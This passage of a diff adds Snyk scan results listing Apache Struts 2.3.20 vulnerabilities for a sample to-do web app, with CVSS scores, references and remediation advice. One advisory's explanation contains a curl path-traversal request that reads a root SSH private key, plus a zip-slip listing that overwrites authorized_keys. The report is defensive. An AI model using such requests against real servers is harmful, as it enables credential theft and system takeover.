Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-040.html", + "title": "Apache Struts Security Bulletin" + }, + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:55.000380Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.211840Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.000380Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. 
It allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-040.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431)\n", + "epssDetails": { + "percentile": "0.83001", + "probability": "0.00914", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4431" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.377000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T04:49:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-21T04:49:27Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.000380Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)" + ] + }, + 
"exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.417349Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. 
It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", + "epssDetails": { + "percentile": "0.77304", + "probability": "0.00531", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4433" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.390000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T01:33:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-21T01:33:07Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.478661Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30778", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.31)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.31" + ], + "patches": [], + "insights": { + 
"triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-042.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/030ffa33543f8953306ed0c0dc815c7fb74d7129", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/8e67b9144aa643769b261e2492cb561e04d016ab", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:03.921305Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:32.508677Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:03.921305Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nAffected versions of the package are vulnerable to Directory Traversal.\n\n## Details\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. 
By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\r\n\r\nDirectory Traversal vulnerabilities can be generally divided into two types:\r\n\r\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\r\n\r\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\r\n\r\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\r\n\r\n```\r\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\r\n```\r\n**Note** `%2e` is the URL encoded version of `.` (dot).\r\n\r\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \r\n\r\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n2018-04-15 22:04:29 ..... 19 19 good.txt\r\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\r\n```\n\n\n## References\n- [Apache Security Advisory](http://struts.apache.org/docs/s2-042.html)\n", + "epssDetails": { + "percentile": "0.89019", + "probability": "0.02019", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-6795" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.415000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-10-19T01:09:09.263000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-10-19T01:09:09.263000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:03.921305Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.31" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "title": "Arbitrary Command Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", + "credit": [ + "LGTM Security Team" + ], + "semver": { + "vulnerable": [ + "[,2.3.34)", + "[2.4,2.5.13)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": 
"org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-052", + "title": "Apache Security Bulletin" + }, + { + "url": "https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax", + "title": "Apache Struts Statement on Equifax Security Breach" + }, + { + "url": "https://www.exploit-db.com/exploits/42627", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/19494718865f2fb7da5ea363de3822f87fbda26", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/6dd6e5cfb7b5e020abffe7e8091bd63fe97c10a", + "title": "GitHub Commit" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement", + "title": "LGTM Advisory" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805", + "title": "LGTM Vulnerability Details" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-9805.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:47:48.667611Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:15.532569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.667611Z" + } + ], + "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source 
framework for developing web applications in the Java programming language.\r\n\r\nThe REST Plugin in affected versions use a `XStreamHandler` with an instance of XStream for deserialization without any type filtering. By design, there are few limits to the type of objects XStream can handle. This flexibility comes at a price. The XML generated or consumed by XStream includes all information required to build Java objects of almost any type. The provided XML data is used by XStream to unmarshal Java objects. An attacker could use this flaw to execute arbitrary code or conduct further attacks.\r\n\r\n[A working exploit](https://github.com/rapid7/metasploit-framework/commit/5ea83fee5ee8c23ad95608b7e2022db5b48340ef) is publicly available and [is actively](https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/) exploited in the wild.\r\n\r\nYou can read more about this vulnerability [on our blog](https://snyk.io/blog/equifax-breach-vulnerable-open-source-libraries/).\r\n\r\n# Details\r\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker control the state or the flow of the execution. 
\r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n- Apache Blog\r\n\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.13` or higher.\r\n\r\nIt is possible that some REST actions stop working because of applied default restrictions on available classes. 
In this case please investigate the new interfaces that were introduced to allow class restrictions per action, those interfaces are:\r\n* org.apache.struts2.rest.handler.AllowedClasses\r\n* org.apache.struts2.rest.handler.AllowedClassNames\r\n* org.apache.struts2.rest.handler.XStreamPermissionProvider\r\n\r\nIf for some reason upgrading is not an option, consider the following workarounds:\r\n1. Disable handling XML pages and requests to such pages\r\n```xml\r\n\r\n```\r\n\r\n2. Override getContentType in XStreamHandler\r\n```java\r\n public class MyXStreamHandler extends XStreamHandler { \r\n public String getContentType() {\r\n return \"not-existing-content-type-@;/&%$#@\";\r\n }\r\n }\r\n```\r\n\r\n3. Register the handler by overriding the one provided by the framework in your struts.xml\r\n```xml\r\n\r\n\r\n```\r\n\r\n## References\r\n- [LGTM Advisory](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement)\r\n- [LGTM Vulnerability Details](https://lgtm.com/blog/apache_struts_CVE-2017-9805)\r\n- [Apache Struts Statement on Equifax Security Breach](https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax)\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-052)", + "epssDetails": { + "percentile": "0.99995", + "probability": "0.97541", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9805" + ], + "CWE": [ + "CWE-20", + "CWE-502" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-06T17:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-09-05T17:28:23Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + 
"groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-06T17:28:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.345481Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Yasser Zamani" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.33)", + "[2.5,2.5.12)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.33", + "2.5.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/086b63735527d4bb0c1dd0d86a7c0374b825ff2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/0d6442bab5b44d93c4c2e63c5335f0a331333b9", + "title": "GitHub Commit" + }, + { + "url": "http://struts.apache.org/docs/s2-049.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:51.213194Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:16.872773Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:51.213194Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nWhen using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack.\n\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.33, 2.5.12 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-049.html)\n- [Struts Announcements Mailing List](https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E)\n", + "epssDetails": { + "percentile": "0.91602", + "probability": "0.03467", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9787" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-07-13T15:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:51.213194Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Adam Cazzolla", + "Jonathan Bullock" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.34)", + "[2.5,2.5.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ 
+ "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/3fddfb6eb562d597c935084e9e81d43ed6bcd02", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/418a20c0594f23764fe29ced400c1219239899a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/744c1f409d983641af3e8e3b573c2f2d2c2c6d9", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/8a04e80f01350c90f053d71366d5e0c2186fded", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/9d47af6ffa355977b5acc713e6d1f25fac260a2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/a05259ed69a5a48379aa91650e4cd1cb4bd6e5a", + "title": "GitHub Commit" + }, + { + "url": "http://struts.apache.org/docs/s2-050.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:48.540352Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:13.755151Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.540352Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web 
applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This is due to an incomplete fix for [CVE-2017-7672](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31499). If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-050.html)\n", + "epssDetails": { + "percentile": "0.90011", + "probability": "0.02403", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9804" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-08-23T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:48.540352Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Huijun Chen", + "Xiaolong Zhu" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.34)", + "[2.5,2.5.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + 